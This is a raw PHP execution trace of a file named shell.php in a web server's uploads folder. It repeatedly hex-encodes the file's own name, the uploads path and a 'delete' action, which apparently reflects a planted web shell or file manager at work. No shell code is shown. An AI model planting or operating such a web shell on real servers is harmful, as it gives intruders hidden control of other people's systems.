3 1764 0 0.060589 485000 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1764 1 0.060600 485072
3 1764 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1765 0 0.060630 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1765 1 0.060641 485072
3 1765 R 104
3 1766 0 0.060654 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1766 1 0.060665 485104
3 1766 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1767 0 0.060694 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1767 1 0.060705 485072
3 1767 R 101
3 1768 0 0.060717 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1768 1 0.060728 485104
3 1768 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1769 0 0.060757 485032 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1769 1 0.060768 485072
3 1769 R 108
3 1770 0 0.060781 485032 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1770 1 0.060792 485104
3 1770 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1771 0 0.060825 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1771 1 0.060836 485080
3 1771 R 108
3 1772 0 0.060848 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1772 1 0.060859 485112
3 1772 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1773 0 0.060887 485040 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1773 1 0.060899 485080
3 1773 R 46
3 1774 0 0.060910 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1774 1 0.060921 485112
3 1774 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1775 0 0.060951 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1775 1 0.060962 485080
3 1775 R 112
3 1776 0 0.060974 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1776 1 0.060985 485112
3 1776 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1777 0 0.061014 485040 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1777 1 0.061025 485080
3 1777 R 104
3 1778 0 0.061037 485040 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1778 1 0.061048 485112
3 1778 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1779 0 0.061076 485048 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1779 1 0.061087 485088
3 1779 R 112
3 1780 0 0.061099 485048 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1780 1 0.061110 485120
3 1780 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1762 1 0.061139 485048
2 1762 R '7368656c6c2e706870'
2 1781 0 0.061153 485128 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1782 0 0.061183 485128 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1782 1 0.061194 485168
3 1782 R 47
3 1783 0 0.061207 485128 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1783 1 0.061218 485200
3 1783 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1784 0 0.061247 485160 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1784 1 0.061261 485200
3 1784 R 118
3 1785 0 0.061273 485160 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1785 1 0.061284 485232
3 1785 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1786 0 0.061339 485160 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1786 1 0.061351 485200
3 1786 R 97
3 1787 0 0.061363 485160 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1787 1 0.061374 485232
3 1787 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1788 0 0.061403 485160 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1788 1 0.061414 485200
3 1788 R 114
3 1789 0 0.061426 485160 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1789 1 0.061437 485232
3 1789 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1790 0 0.061466 485168 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1790 1 0.061477 485208
3 1790 R 47
3 1791 0 0.061489 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1791 1 0.061501 485240
3 1791 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1792 0 0.061529 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1792 1 0.061544 485208
3 1792 R 119
3 1793 0 0.061556 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1793 1 0.061567 485240
3 1793 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1794 0 0.061596 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1794 1 0.061607 485208
3 1794 R 119
3 1795 0 0.061619 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1795 1 0.061630 485240
3 1795 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1796 0 0.061658 485168 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1796 1 0.061669 485208
3 1796 R 119
3 1797 0 0.061681 485168 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1797 1 0.061692 485240
3 1797 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1798 0 0.061720 485176 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1798 1 0.061731 485216
3 1798 R 47
3 1799 0 0.061744 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1799 1 0.061755 485248
3 1799 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1800 0 0.061784 485176 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1800 1 0.061795 485216
3 1800 R 104
3 1801 0 0.061807 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1801 1 0.061818 485248
3 1801 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1802 0 0.061847 485176 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1802 1 0.061858 485216
3 1802 R 116
3 1803 0 0.061870 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1803 1 0.061881 485248
3 1803 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1804 0 0.061910 485176 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1804 1 0.061921 485216
3 1804 R 109
3 1805 0 0.061933 485176 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1805 1 0.061944 485248
3 1805 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1806 0 0.061973 485184 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1806 1 0.061984 485224
3 1806 R 108
3 1807 0 0.061995 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1807 1 0.062006 485256
3 1807 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1808 0 0.062035 485184 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1808 1 0.062046 485224
3 1808 R 47
3 1809 0 0.062058 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1809 1 0.062069 485256
3 1809 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1810 0 0.062098 485184 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1810 1 0.062109 485224
3 1810 R 117
3 1811 0 0.062121 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1811 1 0.062132 485256
3 1811 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1812 0 0.062161 485184 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1812 1 0.062172 485224
3 1812 R 112
3 1813 0 0.062184 485184 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1813 1 0.062196 485256
3 1813 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1814 0 0.062225 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1814 1 0.062239 485232
3 1814 R 108
3 1815 0 0.062251 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1815 1 0.062262 485264
3 1815 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1816 0 0.062290 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1816 1 0.062301 485232
3 1816 R 111
3 1817 0 0.062313 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1817 1 0.062325 485264
3 1817 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1818 0 0.062353 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1818 1 0.062364 485232
3 1818 R 97
3 1819 0 0.062376 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1819 1 0.062387 485264
3 1819 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1820 0 0.062416 485192 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1820 1 0.062428 485232
3 1820 R 100
3 1821 0 0.062440 485192 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1821 1 0.062451 485264
3 1821 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1822 0 0.062479 485208 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1822 1 0.062490 485248
3 1822 R 115
3 1823 0 0.062502 485208 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1823 1 0.062513 485280
3 1823 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1781 1 0.062541 485208
2 1781 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1824 0 0.062557 485256 hex 1 /var/www/html/uploads/shell.php 128 1 'shell.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1825 0 0.062587 485256 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1825 1 0.062598 485296
3 1825 R 115
3 1826 0 0.062610 485256 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1826 1 0.062621 485328
3 1826 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1827 0 0.062649 485288 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1827 1 0.062661 485328
3 1827 R 104
3 1828 0 0.062673 485288 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1828 1 0.062684 485360
3 1828 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1829 0 0.062712 485288 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1829 1 0.062724 485328
3 1829 R 101
3 1830 0 0.062736 485288 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1830 1 0.062748 485360
3 1830 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1831 0 0.062776 485288 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1831 1 0.062787 485328
3 1831 R 108
3 1832 0 0.062799 485288 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1832 1 0.062810 485360
3 1832 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1833 0 0.062838 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1833 1 0.062849 485336
3 1833 R 108
3 1834 0 0.062861 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1834 1 0.062872 485368
3 1834 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1835 0 0.062900 485296 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1835 1 0.062912 485336
3 1835 R 46
3 1836 0 0.062924 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1836 1 0.062938 485368
3 1836 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1837 0 0.062967 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1837 1 0.062979 485336
3 1837 R 112
3 1838 0 0.062991 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1838 1 0.063002 485368
3 1838 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1839 0 0.063030 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1839 1 0.063041 485336
3 1839 R 104
3 1840 0 0.063053 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1840 1 0.063065 485368
3 1840 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1841 0 0.063093 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1841 1 0.063104 485344
3 1841 R 112
3 1842 0 0.063116 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1842 1 0.063127 485376
3 1842 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1824 1 0.063156 485304
2 1824 R '7368656c6c2e706870'
2 1843 0 0.063169 485384 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1844 0 0.063200 485384 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1844 1 0.063211 485424
3 1844 R 47
3 1845 0 0.063223 485384 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1845 1 0.063234 485456
3 1845 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1846 0 0.063268 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1846 1 0.063279 485456
3 1846 R 118
3 1847 0 0.063291 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1847 1 0.063302 485488
3 1847 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1848 0 0.063331 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1848 1 0.063342 485456
3 1848 R 97
3 1849 0 0.063354 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1849 1 0.063365 485488
3 1849 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1850 0 0.063394 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1850 1 0.063405 485456
3 1850 R 114
3 1851 0 0.063417 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1851 1 0.063428 485488
3 1851 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1852 0 0.063457 485424 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1852 1 0.063468 485464
3 1852 R 47
3 1853 0 0.063480 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1853 1 0.063491 485496
3 1853 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1854 0 0.063520 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1854 1 0.063532 485464
3 1854 R 119
3 1855 0 0.063544 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1855 1 0.063555 485496
3 1855 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1856 0 0.063584 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1856 1 0.063595 485464
3 1856 R 119
3 1857 0 0.063607 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1857 1 0.063618 485496
3 1857 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1858 0 0.063650 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1858 1 0.063662 485464
3 1858 R 119
3 1859 0 0.063674 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1859 1 0.063685 485496
3 1859 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1860 0 0.063714 485432 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1860 1 0.063725 485472
3 1860 R 47
3 1861 0 0.063737 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1861 1 0.063749 485504
3 1861 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1862 0 0.063778 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1862 1 0.063789 485472
3 1862 R 104
3 1863 0 0.063801 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1863 1 0.063813 485504
3 1863 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1864 0 0.063841 485432 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1864 1 0.063852 485472
3 1864 R 116
3 1865 0 0.063864 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1865 1 0.063875 485504
3 1865 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1866 0 0.063904 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1866 1 0.063915 485472
3 1866 R 109
3 1867 0 0.063927 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1867 1 0.063939 485504
3 1867 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1868 0 0.063968 485440 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1868 1 0.063979 485480
3 1868 R 108
3 1869 0 0.063991 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1869 1 0.064002 485512
3 1869 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1870 0 0.064031 485440 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1870 1 0.064042 485480
3 1870 R 47
3 1871 0 0.064054 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1871 1 0.064065 485512
3 1871 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1872 0 0.064094 485440 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1872 1 0.064105 485480
3 1872 R 117
3 1873 0 0.064117 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1873 1 0.064128 485512
3 1873 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1874 0 0.064157 485440 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1874 1 0.064168 485480
3 1874 R 112
3 1875 0 0.064180 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1875 1 0.064191 485512
3 1875 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1876 0 0.064220 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1876 1 0.064231 485488
3 1876 R 108
3 1877 0 0.064243 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1877 1 0.064255 485520
3 1877 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1878 0 0.064283 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1878 1 0.064294 485488
3 1878 R 111
3 1879 0 0.064306 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1879 1 0.064317 485520
3 1879 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1880 0 0.064347 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1880 1 0.064361 485488
3 1880 R 97
3 1881 0 0.064373 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1881 1 0.064384 485520
3 1881 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1882 0 0.064413 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1882 1 0.064424 485488
3 1882 R 100
3 1883 0 0.064436 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1883 1 0.064448 485520
3 1883 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1884 0 0.064476 485464 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1884 1 0.064487 485504
3 1884 R 115
3 1885 0 0.064499 485464 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1885 1 0.064509 485536
3 1885 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1843 1 0.064538 485464
2 1843 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1886 0 0.064553 485384 hex 1 /var/www/html/uploads/shell.php 128 1 'delete'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1887 0 0.064583 485384 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1887 1 0.064594 485424
3 1887 R 100
3 1888 0 0.064606 485384 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1888 1 0.064617 485456
3 1888 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1889 0 0.064646 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1889 1 0.064657 485456
3 1889 R 101
3 1890 0 0.064669 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1890 1 0.064680 485488
3 1890 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1891 0 0.064709 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1891 1 0.064720 485456
3 1891 R 108
3 1892 0 0.064732 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1892 1 0.064743 485488
3 1892 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1893 0 0.064772 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1893 1 0.064783 485456
3 1893 R 101
3 1894 0 0.064795 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1894 1 0.064806 485488
3 1894 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1895 0 0.064835 485424 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1895 1 0.064846 485464
3 1895 R 116
3 1896 0 0.064858 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1896 1 0.064869 485496
3 1896 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1897 0 0.064897 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1897 1 0.064908 485464
3 1897 R 101
3 1898 0 0.064920 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1898 1 0.064931 485496
3 1898 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1886 1 0.064959 485424
2 1886 R '64656c657465'
2 1899 0 0.064973 485384 hex 1 /var/www/html/uploads/shell.php 128 1 'shell.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1900 0 0.065003 485384 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1900 1 0.065014 485424
3 1900 R 115
3 1901 0 0.065026 485384 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1901 1 0.065037 485456
3 1901 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1902 0 0.065070 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1902 1 0.065082 485456
3 1902 R 104
3 1903 0 0.065094 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1903 1 0.065105 485488
3 1903 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1904 0 0.065134 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1904 1 0.065145 485456
3 1904 R 101
3 1905 0 0.065157 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1905 1 0.065168 485488
3 1905 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1906 0 0.065196 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1906 1 0.065207 485456
3 1906 R 108
3 1907 0 0.065219 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1907 1 0.065231 485488
3 1907 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1908 0 0.065260 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1908 1 0.065271 485464
3 1908 R 108
3 1909 0 0.065283 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1909 1 0.065294 485496
3 1909 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1910 0 0.065343 485424 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1910 1 0.065354 485464
3 1910 R 46
3 1911 0 0.065366 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1911 1 0.065378 485496
3 1911 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1912 0 0.065409 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1912 1 0.065421 485464
3 1912 R 112
3 1913 0 0.065434 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1913 1 0.065446 485496
3 1913 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1914 0 0.065474 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1914 1 0.065486 485464
3 1914 R 104
3 1915 0 0.065497 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1915 1 0.065509 485496
3 1915 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1916 0 0.065537 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1916 1 0.065548 485472
3 1916 R 112
3 1917 0 0.065561 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1917 1 0.065572 485504
3 1917 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1899 1 0.065601 485432
2 1899 R '7368656c6c2e706870'
1 3 1 0.065617 484360
0.065660 336408
